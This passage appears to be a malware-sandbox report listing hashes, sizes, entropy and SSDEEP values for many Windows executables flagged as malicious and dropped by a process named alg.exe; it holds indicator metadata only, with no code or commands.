                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:yi7l/3roADsqjnhMgeiCl7G0nehbGZpbD:Bl/roAHDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BFD8F50955253286F828E8A1A9FFE27D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CB523915481CC8D9B67BB2544163C4D557A3F0EE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B143ECC4AFAA47EA937E14066CF1AE5C2E8967A1BD766E32476CA27D35E87021
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FCB3FCA586C57096C1BFAA4ADCF39C66F25C760642926334805849A9B62E2B7E76D2866DDD922D1C31538942B0C2A964448042CD8D143271D2B0C3EF75DC733E
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1269248
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.286664484486176
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:O5bfQnuNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ONfQnusqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F92BEDF3A4E028285616F975E614722D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3592FDB8C9ABAEDF76F491B7B3C229D88E991ED1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D0E6DB801CB525682895A457D4D8F88B75EFFD4C1C3613633B0B53397836CA5E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7FF34A24EB9673F8495DCAF9C53DF5D63A74D18A9343977F1DE0129C4CEE4A1D4428D31EBBC9A8B8809C1B477A7B853821A398675104C33FA82A34F2ABAE0AA0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1287680
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.303172224397098
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:JNmt0LDILi21nNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:MLi6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:72B95E5574E6527E85EF3B876CCF65A8
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D445446956A76A1754B551A18818A01E19EA97A5
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7D8417862591E7A37900FCDEFD03066902DD7BBD251FB45BD783EFDC9980DD30
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6D84030FF84FD3E1AA389AA501F24175ADC97976A795D5F16C317E9756669DE4FFB4B894E37C75277D2ADA3F1A97B9E9AF7B7D80B1A5C0468148A9218E3D09F4
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1287680
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.303174800103875
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:+Nmt0LDILi21nNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:dLi6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BA38DA9387C8EE4BCC3268DB7E323722
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4197BA43D7655602929725DDC211E4C1DDAF2336
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:AFB3ACC6F2002003ADBE7BC85A56646A7B7E092FBD7E219AE69729CC6A850606
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:23F5B08F861B0722C70F4F5745CD565D26CF9F594C9D9E28BB8CE4A3520BBD423FE692B574228EEA402BFA0228C6C1A07D7A88B6DC2E87EAE99D8FE491E54D96
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1343488
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.235951295046523
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:SjuozQMGNUbTGNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:6f6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3E13F01B9E25B29D33D1FB0C2ED8580B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2A0CD0A97BF895841646FEB39B3384975F590CB2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BEC1AA9535D9DF8C412E2F3921DC97079AA339FA050A258DDE68517FF575BFF4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7C7DDA2A9C51367B936EDB709899BEBAF0C09C2989DB2962DC0A15860EAC99F29B3AB77BA68977937938AA2E63896C3BACB2B8B1FFDC412D37EADA78D6F5EAD0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1496064
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.577761850813049
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:dbUO42i/EPsqjnhMgeiCl7G0nehbGZpbD:dJzDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:86A76C35F8C54DCAAC23FCD8FB43B07C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C0C9632F4A03528EADC2652C4CF83D4319D1F9B1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D50C13BED0AD7D7B0A17A888FD35363C77A4AE057A5123104D52E7B41B396B43
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5924E2F3F6EF57852B218DC5DA3808791E3F3A272EA1404DA2B3F2973E0F0ADABA2D3EEA0910C1BD92C1AA4A2DF5D87AFD011148BC7409AE26C814DD6E512B8B
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):52712960
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.961837144598512
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1572864:ELjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:gicZmsR3Lo/cnLe
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:99874EF78CFDE6337DDCF765A6E7AD2F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1C95DD751436179E026B9A6E26C8AE05FCCC082D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4A9556F5E243DC8A9E53F2D923F5755F9B759A0659E10300B66BA4821AB7A1D0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AFB1FA61ACBA86381B4725C8ED09FB97EC2BCDB42DAB3A8476AE9AC91FD80CBCB47BF557F79C046C55E79A0ADF4827B9BF7C7B4D3C3F5227A82EA1F3D07F9081
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4993536
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.811043348088706
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:98304:+lkkCqyDEY7+o3OBvfGVY+40ya8yS+9s/pL2D527BWG:wkkCqaE68eV+0ynE6L2VQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6FC20C94DF4704E9DA81CA9C6985FBE8
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:92D6861730C9A253C6D3B0747679E5E65B6E1E6E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6C2AE4D1CE29348B57AB49C9F2BB81FF3D47828C9186D0DE7FB571CC2B65E762
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D5DC0F9F0A35AB5F36DF0AE577993554AE863BB5D88B285FBEC5F5C7D9407B3E98C2D8861140ED5337CC791D9E2456A7790C6FBA6E156B4F19AE01672DF9C588
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1168384
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.044483663946103
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:iNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:isqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9B1B92232B3955318338AF874FB04228
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D1538FB8BEA7BB6F431D79B18C3EC0D1A99B13DC
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D97C669CCC95F9B9E2F5E0309CA78154CDE3E54CF6F618317771856293813D0A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C6ECA2DF1CDFCD99D9B9F59BA003ACF05DBED85ABFA741D876EDF80D9B70E64745CCC3464A73E134509E3BD00717B3CED13FE55C7CCC11BB0E4EC8076B198675
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1522688
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.330412995899653
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:/yAAWSS2H8AsqjnhMgeiCl7G0nehbGZpbD:/IUM88Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5A2CEE4A1733413D807FDA6FCCA28336
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:95DE714AF186990D0A03A4408964CC3E76B92BF4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A508050BF41E981C422A8ADCF15F4B3A59769ED07C018E862BC9659AE96E7264
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:60CEDA5BB56A833CB4596A8766D2F45B58B0C01921DD922928B4A5DA3422BEA1DEB8B1FB948198EEA1797FA051300508ADEFDDD78ABAB800EA6A38DF473E8AC4
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1293824
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.215539198594708
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:bgd4ajNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:MDZsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:167AFCBDD1474884263B73C575627751
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8A427B27B42A37D3EF14399E19DD45CEBC742648
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:837AD5B6F0FF8DCDFB9FB64A21CA63ABB3518E95AF5FD959B74C6ABF36FF8CDC
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A1D6A1847AAEE30A006958FC08A369A87B427472D20123683A12C45629A18495F0E0032B7C95BB0BBF944686D611194B7D8DA45BFF91C980EB9FE7F4BAC8DC41
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1147904
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.039867083469314
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:n0JNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:IsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6F2D927F89898961B7D8F234CFE91CCC
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:482E39BA493FEDA5353A06399EA1FDA52700EF96
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:128DCBEF0F1C01949F5C51C0CCD490CF9C426C72CA3EE0BB22665840A082BA7D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7F89E570894B155CEC3EF48B1EB522C770E0C21BA9789A69B311F9E22783AFFDBEF294FF9E82E21EC0E949E8E5D79301333E0DFC281766580C3DB82D1A6A207F
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1418752
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.397123726083464
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:aAZHHrLZF/FsqjnhMgeiCl7G0nehbGZpbD:aePZF5Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:FAD3AA73FCF9DE08FFE2C21BE15015D3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:AF6314467F6F3A008856D4BB33446799E4800E8B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B0067EF02D5BFB59E2C59C3128CF44C4C612149244F28ACCF23A4A4DB3333874
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0900AE9C0BB66AAA2A67C6B5155FA3DAD415DDCA494046DAE16EE6C08C879164544F04E03748171E3ACC8527F5FAD4441C7F518DF299CBE8AFA26D1793177B33
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):53721600
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.543420102632372
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1572864:yNVpTyR96CwKImp81ujlSHFsQ4adtZp20wfP+9HgoZRZa:yQ9lw68HSq
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8CCED2C549B283F40718393C9FC651C2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A4234A88CC046E3C5421A9FE9B42166A6BB5BA72
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BCEAC00CFB5B218403AFFBDCEA952764CAB73305384C599BF65EE8277FC3AD2F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:33F2743D7C5C40A4DEA90EE25DB4D386A4C945866E304B22ECBC21EC940DB817CC58D93420F6BB97CBE39DC181E002086613F90A91D8FB8051BF5872695D4D1E
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):40811520
Entropy (8bit):6.461588112778556
Encrypted:false
SSDEEP:786432:hbuMdv8TOUI/JgcnYblPv+msZPH53u5LBsk/Q4YbFuceo4h5ayMI5:hyM8TOtIlPv+msZPH1u5WkID5uceo4qY
MD5:CC73EBBB1FA9191C1234027E3A6A2656
SHA1:CC624039D0721570CCC72F5B771EF872F8131011
SHA-256:41D31E02050351249E1C7D766E3E68020412684A6F688FE4F4629329E3477939
SHA-512:E6C8E870FC78FC89FCDC7784F977E0BFF6B641ECB0E5C7826650C1A4B29F4803FF9D14CEC20E6F60CEBA3C8DA6B46E1745626FEA700DB3B69204920281663313
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1657344
Entropy (8bit):5.635152061116808
Encrypted:false
SSDEEP:24576:LE8DMeflpnIOvYUfsqjnhMgeiCl7G0nehbGZpbD:LtDD9pnIOhDmg27RnWGj
MD5:B66C7133483D8529D14BD146998917CE
SHA1:750A04A532F74419A0A71834EA0AABD7EC086154
SHA-256:29C1A17D1DFF63BD2662F1F94BF1FA194AD8B211F72186039C4A2B3367F44C19
SHA-512:9E93AD96BFBB69752398D3C4FD7A442C8FD0A5DC112CCF4B75ABAD254F00B4169540FEB62E4D8A0AB53613E8403A9D7830648136D02283B5D95283CAC50C01D1
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4364800
Entropy (8bit):6.748490117644897
Encrypted:false
SSDEEP:49152:NB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EGDmg27RnWGj:ZHzorVmr2ZkRpdJYolwD527BWG
MD5:4F07926D2A4298DAC2EAE14AF4F3B83F
SHA1:0253F76A97E3CC9DBF6982A3CE5918794A6B4C30
SHA-256:92EC152D988645F84FFD85D5BD87660E975438B5FF93F9000E183B46AB8366A3
SHA-512:6F74B4326314619600B176CDFB64842AB95FB6EBBB56AE4D419C85B5E5888A5D21F5DFD86DF87A4D81B757C0DDEB2A074CFCFDA86C44855A70B12168D4A5FBA3
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1238528
Entropy (8bit):5.146950862940549
Encrypted:false
SSDEEP:12288:E3w1uVdSEjNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:EEyTNsqjnhMgeiCl7G0nehbGZpbD
MD5:4D689BAB6AB247F31547CC0FE6A06B03
SHA1:4AE2539483BA58DB0841B42F6720F45AB638E19F
SHA-256:34DDE1205BB12D83F438E63DFAA8E1F36C3F9B680C7B89FACA9708657477DD06
SHA-512:4AAF0A833C1CA75EA13B9DE10917186684E91EED658A074883F348D09BE103FE040044637E5F2F7293FF00F44A965BCB2727B2E4A45A4513B2E2DF8A5F7FCE20
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2354176
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.049984883365565
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:whDdVrQ95RW0YEHyWQXE/09Val0GwDmg27RnWGj:whHYW+HyWK7D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:73EC7C3D1F7BBEC6D5CE3CCBE3D406B5
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C54A2E339DDC961186E1CA86BFB6108784E094DE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4A5D2DDCE9F28B9F99E4EA588D4139B97EED995461EA31B91D8642090AA6EFE1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:828562B17DFBCD816F70BDA9D422FF8EE12937AE606264F6429817EE4AF5DC2644A8189B9822D5128D1489D3B14069685165DBD15B74C88568B1F14F83B47018
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1825280
Entropy (8bit):7.158500242481018
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1847808
Entropy (8bit):7.145490560166867
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2853376
Entropy (8bit):6.950766441017687
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4320256
Entropy (8bit):6.824623550603783
Encrypted:false
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2062336
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.097257851221503
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:3W9Jml9mmijviMnF+ZxmQWcbLw8VCsqjnhMgeiCl7G0nehbGZpbD:3Wnm5iOMkjmQWkVGDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:61B0B6491ABC2E065EF568F533882664
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC92B87834591262CCC178EF950217411A43DD64
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1BF7A1A1B54A1154D7658773F3788DDBE9AA5B02A96F60BCFC70AB61C38AB793
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E269F2CB0DCE6B823FD0E1CE28907CFD9D5B88831225264FBF5191921B88F2A959EF4657E5ABF04008461EA50ACD6CFA272D84034D65282EE2B25C73604EEECA
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.166379245320892
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:FwNHwoYhua6MtjRO4qbBJTY6mY1uIgssqjnhMgeiCl7G0nehbGZpbD:FwNPdQO7BJTfmErDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6661226F6C1540B67F9C02562D4B010D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5B4E3CE1020D5B7EB87EDDE8117EB8884CEF6D6D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9419F4F88E9BB455439836FEC5B573F0A6632A1DA146C14930459337F53125F4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7CD3FE4BDB8E2137F9E6F0AB07571744DB6ACD9E250989F3BC9FB2DCD8470D124B383580EF092B65F2E7FA19903DC28E86D14F30DFC53300F1CC73018122CA5B
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.145507260950804
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:diD2VmA1YXwHwlklb8boUuWPg2ghsqjnhMgeiCl7G0nehbGZpbD:MD2VmAyiwIb8boQmDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F158F975C6B6A2CFC6300B1B94558A4A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CBF158FAC5603665398730D118EE29A6DB269649
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A234DD7831F4982DD9892F2F85D501DD2A5C85AC865B6B5341F0B63A60D358DB
